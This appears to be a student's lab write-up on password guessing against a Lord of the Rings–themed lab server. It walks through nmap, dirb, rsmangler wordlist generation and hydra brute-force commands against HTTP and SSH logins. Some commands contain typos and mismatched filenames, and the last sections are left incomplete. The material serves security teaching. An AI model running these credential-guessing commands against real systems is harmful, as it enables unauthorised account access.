Lab 5.1: Password-Guessing

Trying to acquire easy to guess usernames/passwords is often the first step in the exploitation stage. This is different from brute-force attempts which can be very processor-intensive, take a very long time and may not yield results.

Scenario

10.0.5.21 has a listing of bios that can in turn be used in information gathering. If successful, you can gain access to hidden resources and possibly a login or two.

Check to make sure SSH works

NSLookup

• run your port scanner script to find the DNS server on the 10.0.5/24 network

10.0.5.22/53 is the DNS server

• nslookup 10.0.5.21 10.0.5.22

  • This command uses the DNS IP address we found to look for a hostname for 10.0.5.21

Deliverable 1. Provide a screenshot that shows the lookup and reported hostname.

Hacking the Shire Staff

Password-guessing tools use wordlists/dictionaries to test combinations of usernames and passwords. Many files are available to download but crawling websites is a useful way to gather words/usernames that may be uniquely associated with a particular organization.

Target: 10.0.5.21

Deliverable 2. Using what you have during the reconnaissance modules, run a scan to determine any listening TCP services to include the service versions. Provide a screenshot of both your command and results.

• nmap -sV 10.0.5.21

  • 22/TCP OPENSSH 8.0

  • 80/TCP Apache httpd 2.4.37

  • 9090/tcp closed zues-admin

Deliverable 3. Let's see if we can get a little more information on your website such as hidden directories. Research the dirb command and run it against the webserver. Turn off recursion. Provide a screenshot of anything secret you've found.

• dirb http://10.0.5.21 -r

  • -r turns of recursion

Deliverable 4. Provide a screenshot that displays a prompt when attempting to access a protected directory.

Cracking the http password

The usernames for our http password protected case will be just the first names for our characters. Such as samwise, pippin, bilbo, and frodo.

Start with one of the group member's output lists from rsmangler to try and guess passwords on the target server.

When doing the maximum characters for Frodo, 8 characters excluded the secret word that I I needed to use to get the password. I increased the max to 12 characters to avoid that issue.

Frodo

• nano frodo.txt

• Input Words:

Frodo Word Lists

First Input Words:

• Drogo

• Primula

• 2968

• Bilbo

• Baggins

Second Input Words:

• Frodo

• 22

• 2968

• Bilbo

• Baggins

Third Input Words:

• Frodo

• Sam

• Gandalf

• Bilbo

• Baggins

• Shire

Fourth Input Words:

• Brandywine

• Bildo

• Pippin

• Strider

• The list to be mangled needs to have a newline at the bottom on it

• rsmangler --file frodo.txt -m 6 -x 12 > frodo.pass.txt

  • --file bilbo.txt specifies the file with the words you want to mangle

  • -m 6 -x 12 means make the words minimum 6 characters and maximum 12 characters

  • > bilbo.pass.txt specifies the file you want to put the mangled words into

• wc -l frodo.pass.txt (to check word count)

• sudo hydra -l frodo -P frodo.pass.txt 10.0.5.21 -m /admin/ http-get

  • -m /admin/ sets the path for the HTTP login page

  • http-get specifies the protocol and method

Pippin

• nano pippin.txt

• Input words:

Pippin Word Lists

First Input Words:

• Merry

• Brandybuck

• Gamgee

• Diamond

• Daramir

• Frodo

Second Input Words:

• Gondor

• Pelennor

• Took

• Paladin

• Eglantine

• Tuckborogh

Third Input Words:

• Pearl

• Pimpernel

• Pervinca

Fourth Input Words:

• Smials

• Tookland

• Fellowship

• Pelennor

• Hobbiton

Fifth Input Words:

• Fellowship

• Pelennor

• Hobbiton

• Pippin

• The list to be mangled needs to have a newline at the bottom on it

• rsmangler --file pippin.txt -m 6 -x 12 > frodo.pass.txt

• wc -l pippin.pass.txt (to check word count)

• sudo hydra -l pippin -P pippin.pass.txt 10.0.5.21 -m /admin/ http-get

Bilbo

• nano bilbo.txt

• Input words:

bilbo Word Lists

First Input Words:

• Bilbo

• Bungo

• Belladonna

• Gandalf

• Frodo

• String

Second Input Words:

• Bilbo

• Sting

• Rivendell

• Shire

• The list to be mangled needs to have a newline at the bottom on it

• rsmangler --file biblo.txt -m 6 -x 12 > biblo.pass.txt

• wc -l bilbo.pass.txt (to check word count)

• sudo hydra -l biblo -P biblo.pass.txt 10.0.5.21 -m /admin/ http-get

Samwise

• nano samwise.txt

• Input words:

samwise Word Lists

First Input Words:

• samwise

• doom

• Frodo

• Hamfast

• Bell

• Gamgee

Second Input Words:

• Hamson

• Halfred

• May

• Daisy

• Marigold

• Rosie

• The list to be mangled needs to have a newline at the bottom on it

• rsmangler --file samwise.txt -m 6 -x 12 > samwise.pass.txt

• wc -l samwise.pass.txt (to check word count)

• sudo hydra -l samwise -P samwise.pass.txt 10.0.5.21 -m /admin/ http-get

Brute forcing system accounts

Brute-forcing web logins can be much faster than some other services. SSH, for example, will often tear-down sessions after 3 failed logins which can slow down password guessing attacks.

The target server also has SSH login accounts for the same staff members though their names are formatted first.lastname. (pippin is a nickname (not a first name) and wouldn't be used)

We are going to be using the same method we used for the http password cracking, but just with ssh instead. Follow the command below for each of the 4 acocunts to find the passwords!

nano wordlist.txt
rsmangler --file wordlist.txt -m 6 -x 12 > wordlist.pass.txt
sudo hydra -l firstname.lastname wordlist.pass.txt 10.0.5.21 -t 4 ssh

frodo.baggins

Frodo Word Lists

• Frodo

• Strider

• Rosie

• Daisy

peregrin.took

Peregrin (pippin) Word Lists

• Pippin

• Shire

• Merry

• Gondor

• Tookland

• Frodo

• Diamond

bilbo.baggins

Bilbo Word Lists

First Input Word

samwise.gamgee

samwise Word Lists

First Input Word